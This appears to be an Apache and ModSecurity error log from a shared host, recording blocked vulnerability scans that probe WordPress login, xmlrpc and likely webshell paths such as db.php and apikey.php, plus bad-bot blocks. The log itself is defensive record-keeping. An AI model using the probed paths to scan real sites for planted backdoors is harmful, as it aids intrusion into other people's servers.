[Tue May 26 13:20:58.528776 2026] [security2:error] [pid 501489:tid 501715] [client 114.119.138.130:34089] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/robots.txt"] [unique_id "ahVQ4mkFNZ9cRlz80IjqdwAAAOQ"]
[Tue May 26 13:20:58.938451 2026] [security2:error] [pid 501489:tid 501642] [client 20.29.64.60:4177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVQ4mkFNZ9cRlz80IjqggAAAJw"], referer: www.google.com
[Tue May 26 13:20:58.950103 2026] [security2:error] [pid 501489:tid 501692] [client 20.29.64.60:4178] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahVQ4mkFNZ9cRlz80IjqfgAAAM0"], referer: www.google.com
[Tue May 26 13:20:58.958708 2026] [security2:error] [pid 501489:tid 501653] [client 20.29.64.60:4161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-plain.php"] [unique_id "ahVQ4mkFNZ9cRlz80IjqgwAAAKY"], referer: www.google.com
[Tue May 26 13:20:59.209634 2026] [security2:error] [pid 501489:tid 501714] [client 20.29.64.60:4178] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahVQ42kFNZ9cRlz80IjqiQAAAOM"], referer: www.google.com
[Tue May 26 13:20:59.444432 2026] [security2:error] [pid 501489:tid 501717] [client 20.29.64.60:4171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/rxoxsgth.php"] [unique_id "ahVQ42kFNZ9cRlz80IjqkwAAAOY"], referer: www.google.com
[Tue May 26 13:20:59.537332 2026] [security2:error] [pid 501489:tid 501741] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ42kFNZ9cRlz80IjqiAAAAPo"]
[Tue May 26 13:21:02.396990 2026] [security2:error] [pid 501489:tid 501750] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ5WkFNZ9cRlz80IjqywAAAQM"]
[Tue May 26 13:21:02.422735 2026] [security2:error] [pid 501489:tid 501731] [client 20.29.64.60:4164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-plain.php"] [unique_id "ahVQ5mkFNZ9cRlz80IjqzwAAAPE"], referer: www.google.com
[Tue May 26 13:21:02.505771 2026] [security2:error] [pid 501489:tid 501652] [client 20.29.64.60:4185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVQ5mkFNZ9cRlz80Ijq1wAAAKU"], referer: www.google.com
[Tue May 26 13:21:02.745987 2026] [security2:error] [pid 501489:tid 501685] [client 20.29.64.60:4177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVQ5mkFNZ9cRlz80Ijq4wAAAMY"]
[Tue May 26 13:21:04.185393 2026] [security2:error] [pid 501489:tid 501619] [client 209.141.34.188:59166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 188.34.141.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahVQ52kFNZ9cRlz80IjrAAAAAIU"]
[Tue May 26 13:21:04.564058 2026] [security2:error] [pid 501489:tid 501693] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ6GkFNZ9cRlz80IjrCgAAAM4"]
[Tue May 26 13:21:04.910689 2026] [security2:error] [pid 501489:tid 501674] [client 20.29.64.60:4741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVQ6GkFNZ9cRlz80IjrHQAAALs"]
[Tue May 26 13:21:05.129674 2026] [security2:error] [pid 501489:tid 501713] [client 20.29.64.60:4753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/usrfjuwo.php"] [unique_id "ahVQ6WkFNZ9cRlz80IjrJwAAAOI"], referer: www.google.com
[Tue May 26 13:21:06.440843 2026] [security2:error] [pid 501489:tid 501711] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ6mkFNZ9cRlz80IjrPgAAAOA"]
[Tue May 26 13:21:07.897918 2026] [security2:error] [pid 501489:tid 501705] [client 20.29.64.60:4744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVQ62kFNZ9cRlz80IjrdgAAANo"]
[Tue May 26 13:21:09.288444 2026] [security2:error] [pid 501489:tid 501742] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ7GkFNZ9cRlz80IjrjgAAAPs"]
[Tue May 26 13:21:09.931800 2026] [security2:error] [pid 501489:tid 501750] [client 20.29.64.60:4180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVQ7WkFNZ9cRlz80IjrpAAAAQM"]
[Tue May 26 13:21:10.431268 2026] [http2:info] [pid 512344:tid 512344] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:21:10.866431 2026] [security2:error] [pid 512344:tid 512490] [client 207.246.106.216:42830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVQ7sbElyei4S77DQfkwwAAABA"]
[Tue May 26 13:21:11.749176 2026] [security2:error] [pid 512344:tid 512570] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ78bElyei4S77DQflAQAAAGA"]
[Tue May 26 13:21:12.176567 2026] [security2:error] [pid 512344:tid 512456] [remote 216.73.217.110:54595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahVQ8MbElyei4S77DQflOQAAI28"]
[Tue May 26 13:21:12.303805 2026] [security2:error] [pid 512344:tid 512592] [client 207.246.106.216:54522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/xmlrpc.php"] [unique_id "ahVQ8MbElyei4S77DQflQgAAAHY"]
[Tue May 26 13:21:12.377351 2026] [security2:error] [pid 512344:tid 512546] [client 207.246.106.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVQ7sbElyei4S77DQfk8QAAAEg"]
[Tue May 26 13:21:12.547032 2026] [security2:error] [pid 512344:tid 512591] [client 207.246.106.216:54520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/xmlrpc.php"] [unique_id "ahVQ8MbElyei4S77DQflUAAAAHU"]
[Tue May 26 13:21:13.569745 2026] [security2:error] [pid 512344:tid 512529] [client 173.239.214.44:32613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.214.239.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "oscpl.co.in"] [uri "/wp-login.php"] [unique_id "ahVQ8cbElyei4S77DQfleAAAADc"]
[Tue May 26 13:21:14.006928 2026] [security2:error] [pid 512344:tid 512528] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ8cbElyei4S77DQflmgAAADY"]
[Tue May 26 13:21:14.547044 2026] [security2:error] [pid 512344:tid 512545] [client 73.196.83.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ8sbElyei4S77DQfltQAAAEc"]
[Tue May 26 13:21:14.578366 2026] [autoindex:error] [pid 512344:tid 512485] [client 205.210.31.88:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:21:15.570976 2026] [autoindex:error] [pid 512344:tid 512504] [client 207.246.106.216:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/wp-content/plugins/mailin/img/flags/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:21:16.656112 2026] [security2:error] [pid 512344:tid 512517] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ9MbElyei4S77DQfmRgAAACs"]
[Tue May 26 13:21:18.441104 2026] [http2:info] [pid 512745:tid 512745] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:21:18.794594 2026] [security2:error] [pid 512344:tid 512514] [client 185.191.171.14:34044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahVQ9sbElyei4S77DQfnDQAAACg"]
[Tue May 26 13:21:18.794725 2026] [security2:error] [pid 512344:tid 512514] [client 185.191.171.14:34044] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahVQ9sbElyei4S77DQfnDQAAACg"]
[Tue May 26 13:21:18.835126 2026] [security2:error] [pid 512344:tid 512529] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ9sbElyei4S77DQfm8QAAADc"]
[Tue May 26 13:21:19.565579 2026] [security2:error] [pid 512745:tid 512891] [client 207.246.106.216:54748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVQ93KSB_s2CvZg7xNMFwAAARo"]
[Tue May 26 13:21:20.315280 2026] [security2:error] [pid 512344:tid 512568] [client 207.246.106.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVQ9sbElyei4S77DQfnBAAAAF4"]
[Tue May 26 13:21:21.037796 2026] [security2:error] [pid 512745:tid 512917] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ-HKSB_s2CvZg7xNMJAAAATQ"]
[Tue May 26 13:21:21.494799 2026] [security2:error] [pid 512344:tid 512481] [client 4.201.75.230:5571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVQ-cbElyei4S77DQfnRQAAAAc"]
[Tue May 26 13:21:22.880457 2026] [security2:error] [pid 512344:tid 512530] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ-sbElyei4S77DQfnVQAAADg"]
[Tue May 26 13:21:25.607938 2026] [security2:error] [pid 512745:tid 512989] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ_XKSB_s2CvZg7xNMSgAAAXw"]
[Tue May 26 13:21:27.485929 2026] [security2:error] [pid 512344:tid 512545] [client 4.201.75.230:5671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVQ_8bElyei4S77DQfnpQAAAEc"]
[Tue May 26 13:21:28.045369 2026] [security2:error] [pid 512344:tid 512536] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ_8bElyei4S77DQfnqgAAAD4"]
[Tue May 26 13:21:30.297745 2026] [security2:error] [pid 512344:tid 512564] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRAcbElyei4S77DQfnygAAAFo"]
[Tue May 26 13:21:32.251116 2026] [security2:error] [pid 512745:tid 512875] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRA3KSB_s2CvZg7xNMqQAAAQo"]
[Tue May 26 13:21:32.304498 2026] [security2:error] [pid 512344:tid 512556] [client 4.201.75.230:5678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVRBMbElyei4S77DQfn5AAAAFI"]
[Tue May 26 13:21:35.270903 2026] [security2:error] [pid 512344:tid 512511] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRBsbElyei4S77DQfn-gAAACU"]
[Tue May 26 13:21:36.931031 2026] [security2:error] [pid 512745:tid 512882] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRCHKSB_s2CvZg7xNM6QAAARE"]
[Tue May 26 13:21:37.672575 2026] [security2:error] [pid 512745:tid 512914] [client 185.88.102.114:13461] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRCXKSB_s2CvZg7xNM9AAAATE"]
[Tue May 26 13:21:37.672612 2026] [security2:error] [pid 512745:tid 512914] [client 185.88.102.114:13461] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRCXKSB_s2CvZg7xNM9AAAATE"]
[Tue May 26 13:21:38.495737 2026] [deflate:error] [pid 512745:tid 512922] (104)Connection reset by peer: [client 185.88.102.114:29851] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:39.303519 2026] [security2:error] [pid 512745:tid 512979] [client 185.88.102.114:24497] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRC3KSB_s2CvZg7xNNDwAAAXI"]
[Tue May 26 13:21:39.303557 2026] [security2:error] [pid 512745:tid 512979] [client 185.88.102.114:24497] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRC3KSB_s2CvZg7xNNDwAAAXI"]
[Tue May 26 13:21:39.386317 2026] [security2:error] [pid 512745:tid 512941] [client 157.90.156.63:17852] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVRC3KSB_s2CvZg7xNNEAAAAUw"], referer: https://thegoodsporting.com
[Tue May 26 13:21:40.038641 2026] [security2:error] [pid 512745:tid 512985] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRC3KSB_s2CvZg7xNNEgAAAXg"]
[Tue May 26 13:21:40.148397 2026] [security2:error] [pid 512745:tid 512964] [client 14.173.181.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRC3KSB_s2CvZg7xNNFgAAAWM"]
[Tue May 26 13:21:40.156287 2026] [deflate:error] [pid 512344:tid 512476] (104)Connection reset by peer: [client 185.88.102.114:19665] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:40.393491 2026] [security2:error] [pid 512344:tid 512504] [client 5.183.252.237:16989] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRC8bElyei4S77DQfoOwAAAB4"]
[Tue May 26 13:21:40.393528 2026] [security2:error] [pid 512344:tid 512504] [client 5.183.252.237:16989] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRC8bElyei4S77DQfoOwAAAB4"]
[Tue May 26 13:21:40.925398 2026] [security2:error] [pid 512745:tid 512894] [client 185.88.102.114:61391] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRDHKSB_s2CvZg7xNNJgAAAR0"]
[Tue May 26 13:21:40.925443 2026] [security2:error] [pid 512745:tid 512894] [client 185.88.102.114:61391] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRDHKSB_s2CvZg7xNNJgAAAR0"]
[Tue May 26 13:21:41.460029 2026] [autoindex:error] [pid 512745:tid 512928] [client 194.163.140.214:53916] AH01276: Cannot serve directory /home1/lifessvo/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:21:41.715418 2026] [deflate:error] [pid 512745:tid 512917] (104)Connection reset by peer: [client 185.88.102.114:18879] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:41.756510 2026] [deflate:error] [pid 512745:tid 512912] (104)Connection reset by peer: [client 5.183.252.237:63209] AH10298: failed reading from PIPE bucket
[Tue May 26 13:21:41.767959 2026] [security2:error] [pid 512344:tid 512503] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRDcbElyei4S77DQfoTAAAAB0"]
[Tue May 26 13:21:42.560224 2026] [security2:error] [pid 512745:tid 512970] [client 185.88.102.114:11285] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRDnKSB_s2CvZg7xNNSgAAAWk"]
[Tue May 26 13:21:42.560254 2026] [security2:error] [pid 512745:tid 512970] [client 185.88.102.114:11285] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRDnKSB_s2CvZg7xNNSgAAAWk"]
